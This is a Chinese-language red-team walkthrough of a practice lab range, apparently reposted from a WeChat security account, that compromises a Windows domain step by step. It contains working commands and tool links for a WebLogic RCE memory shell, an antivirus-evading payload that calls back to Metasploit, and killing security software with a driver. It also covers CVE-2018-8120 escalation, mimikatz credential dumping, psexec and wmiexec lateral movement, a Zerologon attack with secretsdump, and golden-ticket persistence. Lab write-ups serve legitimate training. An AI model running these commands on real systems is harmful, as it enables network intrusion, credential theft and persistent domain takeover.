靶场链接:
https://www.codeprj.com/blog/d3ef831.html
靶机的统一初始密码是:1qaz@WSX
这里模拟互联网为192,内网为10.10
外网打点:
通过Kscan扫描看到该web应用是WebLogic
通过WebLogic漏扫工具测试
存在RCE漏洞,我们直接注入内存马
哥斯拉连接成功
翻翻config文件夹
WebLogic的后台密码,不过是AES加密的,我们可以通过以下工具进行解密还原
https://github.com/Ch1ngg/WebLogicPasswordDecryptorUi/releases/download/v2.0/WebLogicPasswordDecryptor.zip
把解密需要的dat下载到本地
weblogic/1qaz@WSX
成功登录后台
通过该密码对mssql数据库看看是否是相同密码
失败
存在360进程
在github中找了个GoLangBypassAV的免杀马
上传哥斯拉后执行,反弹给MSF
当前权限是administrator
试试模拟令牌未能获取system权限
由于存在360,不能getsystem并且BypassUAC也不行
尝试补丁提权法
systeminfo后将其黏贴到查询网址
这台机器是2008,使用CVE-2018-8120进行提权
成功获取system权限
这里使用Csharp加载驱动干掉杀软进程,基于@ZeroMemoryEx的Terminator项目写的一个C#版,可通过URL远程或本地加载方式干掉杀软。
地址:https://github.com/mertdas/SharpTerminator
如果您收到“无法在受信任列表中注册进程!” 错误你应该手动添加服务:
sc create Terminator binPath= "C:pathtodriver.sys" type= kernel start= demand
还是失败告终
通过刚才的systeminfo发现我们这台web机器在域中
域信息收集:
netconfig Workstationnetuser查看本机用户列表netuser /domain查看域用户netlocalgroup administrators查看本地管理员组netview /domain查看有几个域netuser 用户名 /domain获取指定域用户的信息netgroup /domain查看域里面的工作组,查看把用户分了多少组(只能在域控上操作netgroup 组名 /domain查看域中某工作组netgroup "domain admins" /domain查看域管理员的名字netgroup "domain computers" /domain查看域中的其他主机名netgroup "doamin controllers" /domain(然后ping 域控的域名获得IP地址)
在de1ay域中,域控是DC,ping下获得域控IP
加载mimikatz
发现是x86的进程,需要进行进程迁移到64位的
ps命令找到合适的64位,并且是system权限在运行着
迁移成功,creds_all列举所有凭证,看到该administrator域管理员明文密码
将MSF建个稳定路由和Socks5(其实这步是多余的,打多成了习惯了,原谅)
netbios探测存活主机,发现10.10.10.201这台PC
域横向移动:
msf> use exploit/windows/smb/psexecmsfexploitwindows/smb/psexec) > set rhost 10.10.10.201msfexploit(windows/smb/psexec)> set smbuser administratormsfexploit(windows/smb/psexec)> set smbpass 1qaz@WSXmsfexploit(windows/smb/psexec)> set SMBDomain de1aymsfexploit(windows/smb/psexec)> exploit
获得域成员PC机shell
横向域控制器
不知道是什么原因没有创建会话
改为wmiexec.py横向AD
老规矩,补丁查询法
使用CVE-2020-1472置0漏洞攻击AD
https://codeload.github.com/shanfenglan/cve-2020-1472/zip/refs/heads/main
成功将域控密码hash置空
proxychains4 python3 secretsdump.py de1ay/DC$@10.10.10.10 -no-pass
成功-no-pass导出域内所有用户凭证
权限维持-黄金票据:
我们回到刚刚的wmiexec横向AD后,使用该命令
wmic useraccount get name,sid查询各域内用户的sid值,用于黄金票据的制作
制作黄金票据:
proxychains4 python3 ticketer.py -domain-sid S-1-5-21-2756371121-2868759905-3853650604 -nthash 82dfc71b72a11ef37d663047bc2088fb -domain de1ay.com administrator其中该hash值是krbtgt的哈希值
之后export导入票据到内存中即可
通过命令:
proxychains4 -q impacket-psexec -k -no-pass -dc-ip 10.10.10.10 administrator@DC.de1ay.com -codec gbk即可无密码连接域控,完成权限维持
End................................................
原文始发于微信公众号(513 Sec):红队-二层网络下的域渗透攻防
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论